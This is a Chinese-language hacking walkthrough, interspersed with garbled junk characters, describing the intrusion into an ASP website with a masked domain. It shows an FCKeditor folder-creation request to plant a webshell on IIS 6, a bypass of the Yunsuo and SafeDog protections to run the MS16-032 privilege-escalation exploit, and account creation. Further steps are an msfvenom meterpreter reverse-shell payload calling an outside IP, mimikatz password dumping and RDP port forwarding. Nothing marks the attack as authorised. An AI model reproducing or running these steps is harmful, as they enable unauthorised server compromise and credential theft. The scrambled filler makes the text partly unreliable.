" g" Y) S& s9 o1 F
+ q/ t3 X7 D n7 U$ }( L& m# G " n5 q) r9 t+ ~' M
, M- e: z! z8 y5 |( h
' a# B6 H- X% T6 M% O
/ `9 }# s% g* ?& `: F G j
) l" s" z0 f9 E+ q
一、 利用getwebshell篇
5 m3 |$ Y% ?4 E% @7 ?7 Y
`9 R# `4 s! y: y" d5 f首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: " a/ _! {9 k5 x8 R+ u/ R, o( }
6 {7 t3 l/ a' M+ W1 k7 H2 e
# ]/ \5 M( z% `0 P1 j1 _* L A下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
% ^" r6 x' z* w1 i* u9 A& a7 H8 M
6 q$ [" [/ }- N4 I, m$ m下面我们构造一个asp目录,如: / G6 l7 c. ^0 [6 y8 _ E* U
/ L; D! T) I; S6 j- m
; L3 `* M* ?9 h6 s# T: ~: T
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
- ]7 i: q: n }1 o8 W0 |% b: Y ) u6 U+ j4 z1 o) @
. |5 p" \- ~! n 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 " x& r) b) r* I+ Q- g( i
* ^ u4 S; X1 }9 E4 ?8 C一、 绕过安全狗云锁提权并且加账号 7 ]" r+ ?- c- B6 N' Q' f H
5 a9 @- a4 G K% c- r8 R
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
) Z6 p9 U: K9 t7 K* a+ q' S ' D! r5 g3 v, M- v$ X
如图:
8 B c- M) P$ M; @' S 4 l8 f7 g/ w5 |: Z
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit 3 Y# q4 m. h( n" g. N7 F
+ E( j- ~% Z% f3 V
一、 利用metasploit
/ k' B1 P7 i) ^/ X, O' r 4 t" Y/ N9 ~* C
首先用pentestbox生成一个64位的payload如下命令
8 y- \+ T: X" r2 a! f$ V$ d4 O & {1 b- M C4 g0 N
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe ; p/ j0 Y; p% [
/ q k# \( m# C+ r为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
# \0 G d w3 U' Q- w7 O & x: W ]# r' i0 {* l9 L
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
9 L" K9 J1 l; F! s' c; w, ~
! X# h G( W8 V" H) m, j: H% g! d; J' m下面我们来做一个监听如下命令:
/ a0 A, D( n8 W2 B+ t
& }1 t: x2 ^6 K! k. Sportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: 6 x2 y; S4 Q0 u- V) o" s9 e
/ [; f& a% J; k
; \2 A% Q! J: Z7 U4 @9 X |
3 Z. ~# Q5 o$ K - Y5 D8 A* x9 v9 I/ u; n% ~, m
+ } R- V& W. r( M- @. n
8 g, W7 ], Q8 H' O# c
& l/ h3 O. a5 S' n6 Z
- K6 x6 j: L% r5 k: Q3 a ! h; b" K8 W; S* \/ p# Z
6 j# X% ]- U8 g( @
8 h7 i* k$ b& A/ _- R9 W! E( R- s
" U+ ~6 x* c: t% [ 7 d# i" @4 w; X8 I+ o7 @6 }
2 f1 E0 V8 H7 x A" D
M* W# \( @) X0 r
/ H4 @; t* I0 H. Z2 a2 d |